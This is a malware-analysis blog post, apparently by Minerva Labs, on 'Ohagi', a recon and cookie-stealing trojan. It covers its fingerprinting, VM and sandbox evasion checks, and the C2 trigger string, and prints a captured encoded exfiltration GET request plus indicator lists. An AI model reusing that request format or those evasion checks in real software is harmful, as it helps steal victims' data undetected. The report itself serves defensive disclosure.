Minerva’s Research team have been on the hunt for emerging threats. In recent months we have observed the use of new reconnaissance and cookie stealer malware. This type of activity might suggest an ongoing intelligence gathering operation in preparation of future infiltration. In order to shed more light on this activity we decided to share our findings with the rest of the community.
We chose to name this malware Ohagi (a Japanese cookie-like sweet made from rice and azuki paste) due to the name of the log file the malware writes, its Japanese-based infrastructure and its cookie stealing feature.
Some of the samples are currently detected as:
- Win32/Glodbrom.A
- Trojan.Win32.Twohagis
A Bit About Reconnaissance
Importance
Malware authors are not the first to see the importance of proper intelligence collection. From biblical times to modern warfare – the attacker’s decision making process is based on the results of reconnaissance activity.
When you strike at a target you need to know both its strengths and weaknesses. This applies to cyber-warfare just as it does to conventional warfare. Every fortress has a weak spot – a window that someone forgot to close. There are many equivalents to this “”open window”” in the cyber arena. It can be anything from out-of-date software to a bad user management policy. A sophisticated attacker will first search for a range of those weaknesses and will commence his onslaught only after identifying them.
This “”open window”” is only one aspect of the tale – each fortress has a watchtower, looking out for unwelcomed guests. In the IT world the equivalents of this watchtower are computer security products such as anti-virus programs, sandboxes, firewalls and IDS/IPS products. Just as the watchtower has some blind spots, these products too are not perfect. Recon operations allow an attacker not only to learn the target machine’s weak spots, but also knowledge of how to avoid its most fortified areas. This avoidance of security products is commonly known as an evasive technique.
Example
Real world examples of this methodology are abundant. The Anthem breach, at an American health insurance company, is one of them. The breach was initiated with the ScanBox recon platform only to be followed by more malicious and intrusive tools. The knowledge gathered about Anthem’s systems enabled the individuals behind the intrusion to perform stealthier post-exploitation lateral movements, avoiding detection for a long period of time. This modus operandi is very effective against large enterprises, enabling attackers to detect specific vulnerabilities in their victims’ systems, as was demonstrated several times in a series of similar cases.
Another example for a tool used by attackers for surveying the target environment before the actual attack takes place is Hacking Team’s Scout. HackingTeam provided a custom tailored cyber espionage arsenal to law enforcement and intelligence collection agencies around the globe. Most of their attacks were initiated by deploying a basic Trojan named “”scout””, Its job was to perform a series of tests to fingerprint an infected station. Only after a feedback from scout was received, advanced stages named “”solider”” and ultimately “”elite”” were deployed. Hacking Team’s strategy was simple and effective, enabling them not to compromise their costly assets in hostile environments such as sandboxes, honeypots or forensic analysis machines as seen in one of their leaked email correspondence. This original manual to Hacking Team’s Trojan agent’s operator describes this strategy in detail:
The Ohagi Invasive Recon Tool
Fingerprinting Capabilities
The attackers used the Ohagi malware to extensively fingerprint their targets, lacking classic RAT functionality to exfiltrate any files or to perform keylogging.
We identified several similar variants of the malware, performing the fingerprinting procedure in different ways – some by WMI queries and others by calling Windows API functions. No matter how it was collected, the data gathered was almost exactly the same in each of the variants and consisted of:
- Hardware specifications – From CPU and GPU model to mouse vendor.
- General configuration data about the target station – screen resolution, default language etc.
- Recently accessed files and lists of files in other important folders such as “c:\program files”.
- Enumeration of running processes.
- Basic networking configuration and status, including a dump of ipconfig and netstat.
- VM and Emulation detection – The attackers searched specifically for traces of VMware, VirtualBox, Bochs, QEMU and Wine by looking for known file and registry artifacts.
- Sandbox detection – Cuckoo and Sandboxie are also sought by known techniques and a generic test measuring mouse movements over time.
Ohagi’s core functionality includes six different functions, each in charge of collecting different kind of intelligence, followed by a loop that will exfiltrate data about the user behavior as long as Ohagi is running.
Data Exfiltration
The attackers chose to implement a simple exfiltration mechanism, sending the data in plaintext over HTTP POST requests to varying hard-coded domains:
- snowy-nature.ddns.net
- cloudgoldbom.ddns.net
- thunder-winbecome.ddns.net
All of the above addresses were registered using the notorious dynamic DNS service provider No-IP, and resolve to IP addresses located in Japan:
Below is an example to the way data is sent by one of the samples, found on the public sandbox of Payload Security:
Obsolete Packer Usage
Packers, also known as crypters, are a class of tools used to make the detection and analysis of a malicious executable more difficult.
Some of the Ohagi samples were packed by the MEW 11 SE 1.2 packer, which is considered to be quite a “veteran” packer as it was released over ten years ago.
It is unclear what the attackers wished to achieve by using this packer, as the packed Ohagi is detected by more AV vendors as a generic packed malware than their original compiled version.
As for Anti-RE measures, this packer is simply not good enough and can be easily unpacked by common automatic tools.
Ohagi Neo – The Cookie thief
The unique variant we stumbled upon dubbed as “”ohagi_neo”” had a more malicious nature. Instead of only fingerprinting victims, it was built to steal web browser cookies as well, (hence the name Ohagi). This appears to be an escalation in the attackers’ intentions, who are now actively stealing much more private information.
The creators of Ohagi also chose to switch in this version from No-IP to other free dynamic DNS service provider, afraid.org – their C2 server had an address unique to this variant – sunny.jumpingcrab.com.
We also noticed a different data exfiltration method used by the neo variant – instead of just sending the data over simple HTTP POST requests, they chose to send it encoded in HTTP GET requests.
For example, the malware sends the following request to the C2 server:
GET/images/install.htm?c7b25fc=1102578635&%4F%53%77%69%53%45%39%4E%52%53%49%73%49%6B%31%6C%49%69%77%69%49%69%77%69%4F%53%38%79%4D%43%38%79%4D%44%45%78%58%7A%45%77%4F%6A%4D%36%4F%56%42%4E%49%69%77%69%49%67%3D%3D
HTTP/1.1
The strings colored in yellow and turquoise are identifiers of the campaign and victim. The section marked in green is encoded both in URL and base64 encoding, after decoding it we can see it is a basic identification of the infected machine:
9,””HOME””,””Me””,””””,””9/20/2011_10:3:9PM””,””””
Further analysis enabled us to conclude the general format of these messages:
<Type>,””<infected_hostname>””,””<infected_user>””,””<infected_user_initials>””,””<infection_date>””,””<SystemBiosVersion><SystemBiosDate>””
We observed that Ohagi neo is not stealing the victim’s cookies immediately, instead it sends back the basic info mentioned above and waits for a green light from the C2 server. Only after a buffer containing the string “”BEERBOOMBOOM”” is received it will call the cookie grabbing function:
This behavior is demonstrated by a sample found on the public online sandbox malwr.com:
It is unclear why BEERBOOMBOOM was chosen to be the C2 command to trigger cookie stealing, but it might relate to the hostname of the VirusTotal sandbox machines – TEQUILABOOMBOOM. This communication for example was gathered from Ohagi sample, executed in VirusTotal’s behavioral analysis sandbox:
As you can see, according to the format described above, TEQUILABOOMBOOM is indeed the analysis machine hostname, already known to be blacklisted by in-the-wild malware the Neutrino bot as anti-analysis evasion technique.
The smoking gun linking these two different malware to the same author is the fact that two domains unique to different variants resolve to the IP address, hosted in Japan:
Conclusions
Who is Behind Ohagi?
The identity of those behind Ohagi remains a mystery. We assume that professionals would not use dynamic DNS services as NoIP and afraid.org. On the other hand, the ever-lasting evolution of the attacker and the dozens of samples that we were able to collect also suggests that we are not dealing with a lone wolf.
We can postulate on several other ideas about the identity of the perpetrators – Perhaps they are semi-legit researchers mapping the vulnerabilities in security products like a similar internet mapping project we have already seen? Or maybe they are providers of corporate espionage services, performing a proper recon before an upcoming attack?
Unfortunately, we can’t prove or disprove any of the above theories – and Minerva’s research team will continue to monitor and investigate the evolution of this campaign.
We turn to you- fellow researchers – if you have more information about the mysterious Ohagi, that may enable us to track down the entity behind Ohagi, please contact us via research AT minerva-labs.com.
Minerva’s research team have also notified relevant law enforcement agencies and JPCERT in case this activity is indeed orchestrated by a malicious group.
What should you do?
While it is impossible to evade all security products all of the time, it is feasible to evade a specific configuration. The set of security products used by a potential victim can be detected in various ways – with the Ohagi malware as an example of one of them.
Corporate entities should understand that their sensitive data is not limited only to their files but also includes the network and security product configurations. Minimizing potential leakage of this info will greatly improve the overall security of their systems.
Instead of just minimizing the leakage, we suggest a more proactive approach. Using Minerva’s Anti-Ransomware Platform is an effective preventive measure against this type of malware – both rendering the attackers’ recon efforts useless and alerting the relevant security teams thus giving organizations vital time to prepare for the next step.
In addition, we recommend that organizations perform the following steps:
1. Actively scan for Ohagi traces using the provided IOC below.
2. Check their current sandboxing and analysis machines for potential information leakage as described above (we recommend using the open source tool pafish).
3. In case indicators of Ohagi are found, you should notify security and IR teams and consider the possibility of an impending attack.
For more information and details regarding Ohagi our team may be contacted at Research AT Minerva-labs.com
IOCs
AV Signatures:
Win32/Glodbrom
Trojan.Win32.Twohagis.A
URLs
snowy-nature.ddns.net
cloudgoldbom.ddns.net
thunder-winbecome.ddns.net
sunny.jumpingcrab.com
IP Addresses
114.69.103.233
122.249.229.125
121.1.207.132
220.211.132.42
Hashes
2d1ee234d05642e4ffac251a61ce860614b0516e5ae24430995a8a98c553470b
e7e680fdf8820a12a3305e09eff3382c5d47c92aaa516c192d370a664aff6be7
adf5e7f7ef83a2b21e4ecc418d0476dc768880c6e923f7903ec4f8cb76cd7101
b12f331628fbcad9619d388abf285477ad55bc2c69a6502da507409aad7ca7a3
f365377315fbbebdb8cede51819cffc2a6a9a046cec4b5c2aa3f0fc37542fd8b
657130f8687e1570d355fb9e56dfe9490203cf68978150f3a39f5751b5770ed8
adb8e698ba09a211c0e26e246d8c56166c087441f9ce3fe6a3a9a350078e8307
a07fcd2c046b91226d41f8804bf7a135131eebf00051908829c45b5a658e01ce
3ae3872abe00689c1e9ef725a7f7bc0a52f5f6e09f431c67325b6fc391f42a00
345d8a598f82a21659cac1383e37f03ebd655a81a9d2f9729fce18116db1a25f
a3a2460ecf4d97eeaa498b06ee4a812e459aabf13fc397675179f01576028eac
dd426e682347536feabdcbbb3400cf51fc20f4a228fba46ca9a1e8110a6a3aa5
909db113683b07abc474f1bbe90aa66c3e4e2b97936c6ec28796494f3f9742e3
0f2a4e1cb69676d55ab4c227a4d2b4867d5c571c661005930574f6681f5066c3
02052bb7226b6a92a6b13da4d3c25de72b84054aa6c3e5005c7adcaf0d1d2138
f618343f034c8f12c54887cb214aef0e19222e19226e4ee763974e52be408063
9ad3e1b7991cee8068f5b7f090d7f56731cdb9841d6b3be86401b68ca60a6a75
f724af9c0fc4f9b7d959740295744b22cbd558904ac1ce2a899b3d384c991705
a72fe47faaec9659024fab08c313e2bdc9737fdd771d36902d6dab3185a96e16
c8596950e5ad73232d98a22f6291d261e4a677a9cd8b7deed6780971e7da9312
0293d630b2f7ce42de4b18b710f192424d60cc547aed2a0472c7d761082ca035
b3b8bcff87973f2ccd3330785adcf78fef82fedad8dfde238148f5ad422d4085
2e1a31f8ce5ce3a64534d01907a21a92a453eab51f62d7f49726cd818f7aef9a
3c337d0d96df7ef0db7144cf6b4e71fb870f80ba1115e22b32a6886e827925cd
2c1131f9e13ae522e8c3ce836f59a3eca1e2ae54a6d007d5c8d57e5400e3a3b1
ac48e149eaaf1592dbcf3912f690e22449ed85c9cb4b705aa3467fe237ac592f
03502b4511e228d056a3f539a764dc8be0bb5a4dbee21ab4e76b647868419985
78b84460282ce4a0a76ac317b6f867c2b4eae427293580b34555181acff4ad78
ea97c0635973f190fe6be2fcf90563ddda6f0b44e5f610bae0f9f1ab0635b81a
d3d2a288f4845fa7e075d5236808aa6ab48e2a9d82788d9ec9b52305bdf355fa
878ffae604fdb5929def6cd726d556e0f673123288a83f4ac744c1a6ed3fd9ab
7d37db18817a829c0ea7aa672961383a069d8852e368b6b402e42610ef3fd263
8c989539258ab70cefc19eeb379021f203381c550d646b5c0bc96e4d294aecfb
a726cc68ebaeca0fa4d91473e9784f8c385b8c54c5699d62cd0e2f2acc702189
e66873ea7b60a5cffe02165a2f47491656db8ae5ada664ed405a468fe76853b7
19069919adcff98542bf596280d67cc524e2a35403f6a56c49e229c8f2cbabe9
41d34776364c145270a8f68314e6dd575c9ac3ef601b5902a5be3af426f30170
2bf57ae25110d861cc7bd8b615b2048978ac0e34ea24466cbbfe9bc3762f6bec
3ac67ffed8bc6a379c253317145e420cfb2244531328ff4a6fe65b65e9abfde2
9448c26e11a82c1516f3c7e8c10ac8b94e87a81f9c9f73b66cf422b07f00886f
ca7c895d142b0adcc7217bcb942ff3dbed638c7c37db6b767ad7894ec63d37aa
25550f8a4f57423e644b3cb4cf3475b7a4424f7f5fbe570faef6ace1d3abaf00
d4ef4d46c1eaa575b65a5f5a49e5c01f1b220875638bcc4a65696ff2106a6699
c45d043483ae16b509b92dcf08ddacc91579ff9d5a24d92a01becf160adad821
0b8a6a22e883a1ce26457246268aa714d08c1cd04a1f090eac1c5b9910e7b1f4
8b013261f6c8e9c5f281d5c570251a2f8714f59ea3f0f3973882c6ac642d02f7
938b48e4adcc78a4bd31ad7c5357b3d0319cc8f0fc2f22678b7d7d9b395a5767
04d41a1639ed226e17b806ec4ab9753d096b783b45f2bf8c61b015f3847264ac
4875d5b81c1e231294553a7bd119779d229cbf2877750811d7b07940832e8db7
e28e12815053472ab7176e34dd67f0ab238f8d74ed0857857c027645927c6b52
defe13202320bc02602aecdae10c0c1e8d46b48fc9a942b8222fcfa96d290eca
4c2e6ab33f1caa10feaad77fc8fb0070e96217f872aa443ae8570ee3f1fdfcad
3614a74da1669c4991225e9769c0cb91a0b02b8eec7af2a7ca0e4173acb560a5
1c19ad13c71cf829d1b9a4b3cbdab0610885b9fbe75f24575fd5f1f17cd5f571
6ace8d79fd17988b2072f7fabf6a433d0905bdc84856c755e7a718a4dc7ccb6e
c03e37235b96c3063cd271e689d690c4b9c3cb8506392255fa6a641d8757a0fb
210ed4c05d1143f161d161db4620b0212cde0bf0ba66f25f581527a8d90b7cf5
028c5c8715936a52bbda08cbea9242b373b8c74c674fe654f3316c87d9e1645b
a1202ce4b03452f254f32184f064551f458632a0fc757863f5dd1e0b9d9004eb
c874bea4d8418c7ed105c4b4052ec69635c19088de27f0f501cdf4e2ed84a862
1625f59353f7d6d9236f6669b801a06d92c93123080ba51f535d9e7546fcc475
01259cb8370fd8a7b52c2b1b42555213f397f43d5311202e9fc783fe2b345d24
3d27f5627f485e15d0f606e1b0c3ca284b373c1e3a5e4a4e7a3e74103ea2a803
1ee628ab3c78d8f870e0e5113a99c84bb405ee0af52f2b64463085f32f2a2daf
fb9e6d7613d5d420ffb03dfc0c0a98087c22f1b5cff7876df6ecef589cb6d8f9
a5dc6e136c2f9e0e7bd27ede4cf5fd5b34e2520d8280e0c54cbb97b4b0bcd3b9
19e1b3dd4f3969e81afeba38c092087f97714d82ba84cb1b9fc6f242b2063c39
18abc465e6513b97799aafd39f33b8bda16d94fa9537f8e26fae4c41c24b956c
c580d28a4f6f3da779b81c4c8ed3945227c5d09a0e4954f3d9df08a71d2a312c
b3d4316f29a3f3fac01b04a4161fcb38ad0faef1592e59772eb620b02ffa0b91
f124197f3a7c8f0a19132a81addf19a202fbd50120f896461e3de5b93e533790
65e3caa1da7e1e526fba27a6523a07dc65febea24daa4da07db469778b9adcd8
7693cf07b4a8feac65a51009049f3c81646d0ae7345f675e1f5b77797ed89652
6fe99e70a68eaf2e0dd3a9b1a2bd5247b82aaedc34a35a89a8d2b715eb5359cc
f24ed956a96d45102f2367097defaba5774f7672afb4dfd6811ba958d5223173
a8ab69f07edaeef205536444ad6fc90a19961e56e46292d566dae3213685ed33
91701710fff5bc29e15f4ad40ed4218f7f003fbb8ec2afaeed63a3f25253c995
013f85a6e076ccbb76b716e16f62f1ca00c52bb8a4b1b535a07e059647430cc2
854acbc1222fd85dc373fb44ebec8f2e19cb70d1a75a684b2586b609be3b9e1a
d7a4df811dd8f2bc6d023561d7cdc0e421ff9e1230f00ce089fdf3a80dab7e22
d0d7c50800ecf49ba6f85a71e8d01caca21e130cc8f2b44407e4d1d3b4b919f6
7cf5fa1f53ff99c90cceaa40801680ca318519b4e88ff430e7d43618976db969
26b72cdf5459ea1d99264b8ad28ea89bcba310a335314011c79825e07e76f489
c2c68211b4d75e58729dad6574342f2aa8d7cb74ec717c8a9ca39bbe768a3625
3df37738a792058b18bb6f82b3b29b37a81128a95711b99e66f8b70df9d1ee51
a5dbe4f0347dc1226d8ac686c48c9c49c8b7c94cafc39591c47c5edcff821fe8
098f5a334cc7ca77153865d35f9111cb7dfc92a552137bd85c489c5d8cfd90df
0493c5d5b42a09d1f94817797bc140eba059fe9b35cf85ff010e686c74952259
eb083da48e1caf49e682d02a63e6d064d1efcbcf71b511894472792c7f4eca61
7707bc4e7bfc79aba2cb517d9b9524882b563e21dc1cfbd863788890342633d3
ade91d1d4b13de0b0ac395d2d3f7754ad6de4a1775e233c693071e66fc2f7a35
f5e07ab16ff933e8e846c4ccb14120f5fc31e5581304a669f8eda50b439c2be0
2a7ad3428bc49904eeb192e554362b153359acb545628133357fcf62f6b82dd1
b558783aa1440f7e82f605ccebf884876c67890fc745701bed262185f94f7621
2e982f6ecd13962138247bf8d2b8b8d3c9f923bd089615394cfa7e7d7dbccc52
d75d42a91a4cdd1926e089c7b6493c21787960d23f6b1cc8bf34debabd0392f1
d2d2d921edd39de1403bb787e72e1e8eb7004cfb006253315f75672f888e39e9
62a478762fa3b6793df4c861b3111d1ad63f6a0b151ac54e93da64b5e3152caf
72fc079b9ded20fa084b2a9a7d66934f188adeb7a303b9f4f1e7589f489055e0
0e4c2222ceea00aeb0d4601c5487cfd92125922084bba2c19d57eddc86e5ad50
f064be0e45b41d7243ad17f9e6f071fb7b4155a53fe7960be6d28139bc401f2e
8ed226a04253d537c30958264adb15344d0e67ca4667263a9d504bccab15ad3e
0be45a39a215ef93e93f22f30cd3bb3f73b844f1ec6569a354501445faffbcea
90595761ab701cc4f467614478b560226ff3e496e05c3b4f06034d07fdfa942f
72e4df8bbb9c50de36c7a84077d722a9ced64988180796554ef80d0ef88b3f96
98cfed1fda03ac82dbdb0101e989ce35a0274a6e6dc46d26e126080025a28368
f6de6010ddb4559d277de45b9231cad17cc2e4a1a24d3210704f199d5b9c1803
ba30be6f9172d564fa5059b4dcaebe7b723755aece2d6bcc966365e31b76d4b4
19cc2d2798a0a6117caf34e610e20ae6b8c7aaa50723e1544305a3eabde1e782
d178603d90da5662df0dcea4c63a956e285e72b6076c9465334e968ca81b7e9d
c4ec11aa182bc099b9788251fa1e64c3a0795cc1c30fe1e166f879526570f390
9ff0eb51560f2ecaafa916562c0cda96ad7356f7f44ed2b9323ff43d2e53c06e
9511c22600baea68deb2a7cc182cec9f4a39795677138eb03e38a874a667a6ed
3c3edd1ae5827178860b8a5feb176f8ac97a309a87dfdee1495d7432ba3aee03
f102e1791611428688c19acbb7275a072f9557d6103e72eacb724a8e5892cd4b
b6c00438e299622257959170404d0656a56bcd2b038ecb21b309d6f5ab0d9791
7639a5cc49ff9b626796ea1ee603df1db85d94435fd6e5d1034e70130f558049
74bdcc74ef18e67d0eab63d0710e7664bfb352d7de627b72f14df2ee5bd0c187
7925dca02d6fd976539f3ae5e7cdc8438fc1121c30a492a658db5d6fffb54864
e02d13986c6b20727faf6eb177ca2ce0f793ec22e8b21475a8cc191353b8b729
2152abfccfeda970c04c79558e36521f0ed2324b8a603eee33a2af771552b7c0
7369b5d032e251c62a6d8c2b22ed4ed8d4860ce607ed55764d336a2f1e25c84f
f1f37c00dfeb7150de9043a1392de7fcacc2de171711be265f703d44bdec5959
650fede487f1c4614a31799eef28c32ff90a75c9bc9c3defa42f167c023f3671
3fd7f3780932298e9027ff02377219396961a3304c375bc13bf9b4c02906d73c
b9312bda8ac4da6ca786eac442c9fbdd338f9a5ef9731437c8de64f8991b15aa
4a7ccdf9151402a802c3f720a4bf7e85bf862d25d3b7cad26d9df26eda82cb92
9ab92fdf0dc2aae9ab91bb565e81c8fdc70d731bed56c3b12369316e6c390f55
635747484d4675519f6a36fcbd31517093691bb77639fc86135f3fb073b5c94d
1b7981194c8fe343f9341a7e1260d13a87a5a07bd552202405f53269a17e1b5b
9fd2c844bb06227f6b023e091c5f261ee10b09db82e1d4615ed8cad23007e637
1131b8a5a114b577c55b307ab1ffa9e39148cb3ac5c17d8029f167075e63e516
39d4a9f6100ff237284240e235254696ddbadcd78db2d5269a764a78eff1a3b8
0b24b637f34350ac9b5d51d5fc0f19a636a3e1c1a524ef9cdb3cbfc9d5f8f6e9
d625a26c0517a1a37d3dcdc9a4bfe9d193f2447dd81e457ee88ee1806f1872f7
1350d90d4de4048f9da5b1bda141d397b8befa3a11d7c4528f3c7e85f109c2bc
8338fa12d2a59751bdf1dfae07af20b1fae39f82d1658db1c4eb2e85412be1af
0b80d7ce746bc095f62d7d32417764aef43db437799089821346ba07cb2e65c2
76a2ee1a805efd214316c87b10b70e115cc64d727d76125465e1cfbf6954407e
fa1cbc0d78fbf211a8e4a6b3ac9c469ff3dd0a4c8fad99d382ff56872f8a6d89
0ca7abf54e889f179793583f3d5bcd536557ec3b591e352b9403be6c5cc0f33a
304e67097992e526e24157c311761b4d29b70197feb3e05c36880e463ebbe9ed
5fe86c0060a0e9617865bce84757eacc9936bcfeb1d404c6b3a2fa00a8c56282
53cc571eb884fa83da50e77771138a1831efa1e67e41076b5ba162d687028a35
a855bca9af2afc1579c481ae3aaa88a3a93552f6f7d3b67f1fa6ca8f4c4fa549
371c7c3263f9bb765527c93e25ed453b8f3826b49342c97c40f2ec93f4f55a36
d56f503b3d842d6617b0682b9301ec63201ff7f5c73772df68c6feed982815bf
d1e737271d42beb5390e1889af2f14b85216712bb93f45e25a974e5c12dc9709
8b52434ebca79b998361b6705f327fe12abc8fcab75dba640d54db920f4dad43
638be0c24a1c723bde3942a348d9d437131d18deb4da288e870fcd093e00e493
dfb6705042508292efa0cfc8187fcfbed9052a7c81f6a55c4c1d841bb5d35e64
98d8b23fa6319477c5c9b3783ece257b3a1f54f827d688ffc33e95c96a399316
62e5bd49e37ec65d8635229663035a83e40bcdf68289ab1fe0f5ddc7596a6e64
c45aad58d0510455d753c1b7275918450f1a4d47c41c28a7c986be0e5354b706
4c9d930a0797e91aa1d4762601eaa73706d9607aeeca4194f787bce3ed0efa94
4ea3d3af375ef0d8e6f073a0346984220b498f754e6c0224603a3175de3f3dea
24ff15145277a3478ae3409873a5393da1e997844ac78603479218b728ac5e86
d99817cc888aa1173c8d1f2723e10f03ddf368c6f1d91f6cc40571d6bc0a39a8
47a7ef1547b8338c3131eb9c178a0a1b64a54f36608d14016cff7c8b9a3fe7f6
16bc005f8367c31c2700da3d9416784287b004b5225f8fc85a6d4696d8494030
1cac8a6fc490bae6cb346b1ae01feaa581a7779c8d984f3073cd3578ea1fad75
94c1af8ce58abf92d47c4c60eb2b43ab2b64b4547065515efe58ab33158e302d
00af042f1bb6ec93d0a2ffb59e42dff29c33c8ce096a6f144a7a2a2d43d699ac
fd49e6ce1af28aec10163ea1e10f196ad8c1496cc16f4559d82180196dd8bd00
f4c007f67baea26822862d15529be562cf85cd3856b13abd40631d5681e4aac0
58abd68d31659bec5f84b34607547bbe59e3277e2b5babaf5a86fbc42e565e7f
fcc1e07174c7ac7cf106b58abb6d7ea0036cd5436b3baa16ea9c03b40836337a
e3785636dbe5fb1d001821b39f880f213f480d4714a11c4ad171e69c1b1545e3
eda727531e9b8e618049481a34146b13f29e741075909166fcb60d3e976ed79f
b37d1066cff636506e0b13f8912f951fe287b315832952cdca8bb172ee81b05c
f275b7100f951234ab8e0a0ad78995fd33b6c14561786bedf6b9114c58555bec
e57b153f889aa3fe2dad9583fb0be61d19bb4cb2bad044891beda76e1d1b01b0
c7de8797f3928607ffca00836986734906501dc4eeef9652c7d71ca86b6b421d
2c5bc373925677ee860d7e11758987140cd030ad19ead9c6b98c98ed5d968470
3c0e2b553743458bc71d0090126a8317d313bac69eaea0ec9af4ec359b37345b
203e41f9f38136d2f3b3fd14b731d5ec86fcf7e3105039619b8a919360cf778f
0f35c49af2d89f81885f8fb8e8095e1ae4ea80ec2f1eb6d47671a3bd77de430a
82450b84b4d26c8ba30d43660dd5142a43eae1000deeb3e220abbd5dcd3ca00d
7d004b9a94c65f1b379566057f896b1bbf003d428b7dcc40eb3eeb395ed893b8
4a980f2101e1a98b955f2da9b223fd95ba90f7aa198d82f697ca8f1446027fe5
60dde2dc3b0ca0434181137db7481db36c3967be2d6cc664769bfcd704a5a2cf
8d08b7db841b189f1fc204cb45190d4c40d22e75362d5bb8ecf5eaecf2dab288
aa4631a7de7cdb086c9c3b77465a16ddea960716e2fd6dbab4f37d68f2d0b327
4ac50fd6c041a52636c09d97b8860e1fc40daa3b6deb292db99bd6c9f8c5d033
b6519731ce1b1b0527d3c077707bc7f0dd8acdb0c7e263af42e9558e7d46ac98
1a359f24be26d283c4065a7aab098c620d27d2ad1099123a5013ef789dc3b405
f879bf7e68d2dd871fa609318cdb7a081736c2d4579dd2790c132f9f756a38f9
ad5fda493b80bd5bca18e9834d051d268bdf5a3a2d4c442ab7004132bca1c13b
8dfaa4d52f7c429378306962c26c6808e6d2ca359727e2b2104f0a549563e1c5
e4e883050200431e05b87ad7c185e06ecfe4367496cebcd39576962dd47fb3a9
3fdebad1c4d482a62d460f75be65e95a0a8f8759593df754c397c9c095c6fe8e
4dba83e209d216bf9ca8a0f5b7161f1e4680cf217b2c71ea9efd7f0de38ee5c4
939586cbcb78f8d964fbf931a4f7003b6d3fd6a33f097c90f7bfca2b943c0eea
e9180a36f941c9f42cd9f92d23268e772ff8d1b1dc69608a22a6319e1a1889a4
4f274c649c14935bdb38a56e1c6618310724c7454711101c60f0c2f8b2ec29a6
b62903db533cfbcef3f95f232fb74d6f5cc779a5029819eb52aa80867d103adc
48051c6c0f6db10ecb357b306e21ca10fcc4ea5d662902b13ad5acd6fe1a024c
39d852248906e12615f24d2101903627aa54d374ba0f32ac5882ba57238a77d5
a9264005fa1a17db72547baad066dccb89062832ebb84ba6a54c7adeaceec510
b2f9beff90e8caf287e527d30035285ac82d8656b1c44c33f0e7e4835403de59
74947b368840fe70f12dedd8501288127262a0ec1bcec087077ba14bf37549b9
56438fb52cdddec5ab514a4130e46b2f35266ad013837e26db60e1f2150ce76e
02bf744f2f1d3a951f44684ffa54eca7bd059c3a12e078a37e74d4652d6c5e1c
8a1480f46d03d38d6840a3a40a13ba89822459e4dbb9c5d6aa69aeca3bfa4ea